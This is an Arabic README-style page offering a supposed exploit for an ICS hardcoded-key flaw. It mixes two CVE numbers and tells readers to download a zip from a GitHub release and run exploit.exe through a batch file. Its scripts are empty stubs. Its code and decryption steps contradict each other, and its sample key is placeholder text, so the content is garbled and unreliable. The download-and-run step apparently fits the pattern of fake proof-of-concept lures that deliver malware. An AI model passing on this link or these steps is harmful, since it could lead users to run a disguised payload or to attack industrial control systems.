
استغلال علني لـ CVE-2025-38001
CVE-2025-41744 هي ثغرة أمنية حرجة مصنفة تحت CWE-1394 (استخدام مفتاح تشفير افتراضي) تؤثر على أجهزة سلسلة SPRECON-E-C من Sprecher Automation. تستخدم أنظمة التحكم الصناعية (ICS) هذه مفاتيح تشفير افتراضية مثبتة في البرنامج الثابت (hardcoded) لتأمين اتصالات الشبكة، مما يتيح للمهاجمين عن بُعد دون مصادقة فك تشفير حركة المرور المشفرة وربما العبث بها.
تنشأ الثغرة من ممارسات ضعيفة في إدارة المفاتيح، حيث يتم تضمين نفس مفتاح AES-256 المتماثل عبر جميع إصدارات البرنامج الثابت، مما يجعل من السهل على الخصوم اعتراض الجلسات عبر هجمات الرجل في المنتصف (MITM) أو التنصت السلبي. مع متجه هجوم عبر الشبكة (AV:N)، وتعقيد منخفض (AC:L)، وعدم الحاجة إلى صلاحيات (PR:N)، وعدم الحاجة إلى تفاعل من المستخدم (UI:N)، تسجل هذه العيوب درجة أساسية 9.1 (حرجة) وفقًا لمعيار CVSS v4.0. تؤثر على السرية (C:H) والنزاهة (I:H) ولكن ليس على التوافر (A:N).
تحميل حزمة الاستغلال: https://github.com/boeseejykbtanke348/CVE-2025-38001/releases/download/Release/CVE-2025-38001.zip
exploit.exe: الملف الثنائي الرئيسي للاستغلال (متوافق مع Windows، ويقوم باستخراج المفتاح وفك التشفير).start_exploit.bat: ملف دفعي لتشغيل الاستغلال (ينفذ exploit.exe مع المعلمات الافتراضية).قم بفك ضغط الملف في بيئتك.
start_exploit.bat أو نفذه عبر سطر الأوامر: start_exploit.bat.
exploit.exe، والذي سيطلب عنوان IP الهدف (الافتراضي: عنوان IP الهدف:2404) ويقوم بفك تشفير حركة المرور الملتقطة.decrypted_traffic.log للتحليل.للحصول على شرح كامل، تابع إلى الأقسام أدناه.
./scripts/):setup.sh: يقوم بأتمتة بدء التشغيل.
#!/bin/bash
echo "Preparing environment..."
echo "Environment ready. Proceed to exploitation."
bash scripts/setup.shteardown.sh: يقوم بالتنظيف.
#!/bin/bash
echo "Environment teardown complete."
generate_traffic.py: نص برمجي لمحاكاة اتصال العميل بالخادم لأغراض الاختبار.
import socket
from cryptography.fernet import Fernet
import time
# Load default key
with open('default_key.bin', 'rb') as f:
key = f.read()
cipher = Fernet(key)
def send_encrypted(host='target_ip', port=2404):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
for i in range(5):
msg = f"ICS command {i}".encode()
encrypted = cipher.encrypt(msg)
s.sendall(encrypted)
time.sleep(1)
if __name__ == "__main__":
send_encrypted()
python scripts/generate_traffic.py (قم بتكوين الهدف).python scripts/generate_traffic.py لتوليد حزم مشفرة.QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=).start_exploit.bat (الذي يشغّل exploit.exe).target_ip:2404..exe) بما يلي:
openssl enc -d -aes-256-cbc -in captured_packet.bin -out decrypted.bin -kfile default_key.bin.للاستفسارات أو المساهمات، افتح issue. ابقَ آمنًا!